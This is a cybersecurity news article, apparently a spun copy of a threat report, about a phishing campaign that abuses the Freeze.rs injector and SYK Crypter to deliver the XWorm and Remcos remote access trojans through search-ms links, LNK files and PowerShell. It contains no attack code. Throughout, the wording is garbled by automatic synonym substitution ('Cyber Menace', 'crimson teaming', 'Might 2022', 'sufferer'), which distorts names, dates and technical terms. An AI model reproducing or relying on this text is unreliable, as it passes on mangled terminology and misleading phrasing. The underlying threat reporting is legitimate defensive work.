Freeze[.]rs Injector Weaponized for XWorm Malware Assaults


Aug 10, 2023THNMalware / Cyber Menace

XWorm Malware Attacks

Malicious actors are utilizing a respectable Rust-based injector known as Freeze[.]rs to deploy a commodity malware known as XWorm in sufferer environments.

The novel assault chain, detected by Fortinet FortiGuard Labs on July 13, 2023, is initiated through a phishing electronic mail containing a booby-trapped PDF file. It has additionally been used to introduce Remcos RAT by way of a crypter known as SYK Crypter, which was first documented by Morphisec in Might 2022.

“This file redirects to an HTML file and makes use of the ‘search-ms’ protocol to entry an LNK file on a distant server,” safety researcher Cara Lin mentioned. “Upon clicking the LNK file, a PowerShell script executes Freeze[.]rs and SYK Crypter for additional offensive actions.”

Freeze[.]rs, launched on Might 4, 2023, is a open-source crimson teaming device from Optiv that capabilities as a payload creation device used for circumventing safety options and executing shellcode in a stealthy method.

Cybersecurity

“Freeze[.]rs makes use of a number of strategies to not solely take away Userland EDR hooks, however to additionally execute shellcode in such a manner that it circumvents different endpoint monitoring controls,” in keeping with an outline shared on GitHub.

SYK Crypter, then again, is a device employed to distributed all kinds of malware households corresponding to AsyncRAT, NanoCore RAT, njRAT, QuasarRAT, RedLine Stealer, and Warzone RAT (aka Ave Maria). It is retrieved from the Discord content material supply community (CDN) by way of a .NET loader connected to emails that masquerades as benign buy orders.

“This assault chain delivers a crypter that’s persistent, options a number of layers of obfuscation, and makes use of polymorphism to take care of its capacity to keep away from detection by safety options,” Morphisec researcher Hido Cohen defined.

XWorm Malware Attacks

It is price noting that the abuse of the “search-ms” URI protocol handler was just lately highlighted by Trellix, which unearthed an infection sequences bearing HTML or PDF attachments to run searches on an attacker-controlled server and checklist malicious recordsdata within the Home windows File Explorer as if they’re native search outcomes.

Cybersecurity

The findings from Fortinet are not any totally different in that the recordsdata are camouflaged as PDF recordsdata however are literally LNK recordsdata that execute a PowerShell script to launch the Rust-based injector, whereas displaying a decoy PDF doc.

Within the closing stage, the injected shellcode is decrypted to execute the XWorm distant entry trojan and harvest delicate knowledge, corresponding to machine data, screenshots, and keystrokes, and remotely management the compromised system.

The truth that a three-month-old program is already being weaponized in assaults symbolizes the fast adoption of offensive instruments by malicious actors to fulfill their objectives.

That is not all. The PowerShell script, moreover loading the injector, is configured to run one other executable, which capabilities as a dropper by contacting a distant server to fetch the SYK Crypter containing the encrypted Remcos RAT malware.

“The mixture of XWorm and Remcos creates a formidable trojan with an array of malicious functionalities,” Lin mentioned. “The C2 server’s visitors report […] reveals Europe and North America as the first targets of this malicious marketing campaign.”

Discovered this text attention-grabbing? Comply with us on Twitter and LinkedIn to learn extra unique content material we submit.



Related Articles

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Latest Articles